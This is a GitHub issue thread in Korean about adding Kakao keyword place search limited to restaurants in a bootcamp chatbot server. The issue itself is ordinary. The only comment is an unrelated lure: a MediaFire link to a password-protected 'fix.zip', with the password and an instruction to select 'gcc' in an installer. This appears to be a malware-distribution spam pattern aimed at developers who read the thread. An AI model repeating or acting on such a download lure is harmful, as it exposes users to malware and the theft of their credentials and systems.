### ISSUE TITLE
✨ 카카오 API를 통한 키워드 맛집(음식점) 검색 구현

### ISSUE THREAD

**Issue by swandevson** [kakao-tech-bootcamp-17th/chatbot-server#11]
- [x] [해당 API](https://developers.kakao.com/docs/latest/ko/local/dev-guide#search-by-keyword)를 활용하여 키워드 장소 검색 API 연동
    - [x] 음식점(맛집)만 검색되도록 제한

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
